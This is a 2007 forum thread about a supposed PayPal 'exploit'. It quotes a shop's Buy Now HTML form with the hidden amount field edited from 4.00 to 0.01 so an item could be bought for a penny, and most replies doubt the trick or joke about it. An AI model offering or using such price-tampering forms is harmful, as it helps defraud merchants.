Threaded Mode | Linear Mode

boogschd · 03/12/2007 03:33 AM

found this in stumbleupon just now
link

fr33dom.net Wrote:Lets Say you want to buy something from http://www.site.com
and it has the pay with paypal button. The item you want costs lets say 4 dollars.

<form method="post" action="http://www.site.com/process.php">
<input type="hidden" name="amount" value="4.00">
<input type="hidden" name="item_name" value="$4.00 Item">
<input type="hidden" name="item_number" value="1">
<input type="hidden" name="no_note" value="1">
<input type="hidden" name="currency_code" value="USD">
<input type="hidden" name="no_shipping" value="1">
<input type="hidden" name="quantity" value="1">
<input type="hidden" name="bn" value="PP-BuyNowBF">
<input type="hidden" name="cmd" value="_xclick">
<input type="image" src="http://www.paypal.com/en_US/i/btn/x-click-but01.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
</form>

You can find that in source.
Now all you do is.
copy that put it into a new HTML document and edit it to

<form method="post" action="http://www.site.com/process.php">
<input type="hidden" name="amount" value="00.01">
<input type="hidden" name="item_name" value="$4.00 Item">
<input type="hidden" name="item_number" value="1">
<input type="hidden" name="no_note" value="1">
<input type="hidden" name="currency_code" value="USD">
<input type="hidden" name="no_shipping" value="1">
<input type="hidden" name="quantity" value="1">
<input type="hidden" name="bn" value="PP-BuyNowBF">
<input type="hidden" name="cmd" value="_xclick">
<input type="image" src="http://www.paypal.com/en_US/i/btn/x-click-but01.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
</form>

i don't have paypal so i can't try it..
but i guess they thought of a way to fix this by this time

S7* · 03/12/2007 03:53 AM

no fudging way D:

Hurtween · 03/12/2007 04:15 AM

wowowo wo.

Somebody try this!

diego · 03/12/2007 05:32 AM

thos must be a major glitch in the system.
'this can help you bankrupt paypal.
Don't DO IT

sticky · 03/12/2007 05:34 AM

must be fake.

boogschd · 03/12/2007 05:37 AM

for the record... i didnt claim it was real...

sticky · 03/12/2007 05:40 AM

yeah, didnt say you said it but i said you said its just a said that i didnt said it to be a said truth so you said you is not said not never said.

ZiNgA BuRgA · 03/12/2007 05:57 AM

I have doubts such a high profile site would fall for a simple exploit...
Though why they even place those values in the first place in the HTML is somewhat beyond me...

Nice find though - feel free to try it! XD

sticky · 03/12/2007 06:06 AM

and expect police knocking the door of the one who did it and got caught. =P

YoYoBallz · 03/12/2007 10:30 AM

sticky Wrote:and expect police knocking the door of the one who did it and got caught. =P

lol yeah

Threaded Mode \| Linear Mode paypal exploit? apparently....
Author	Message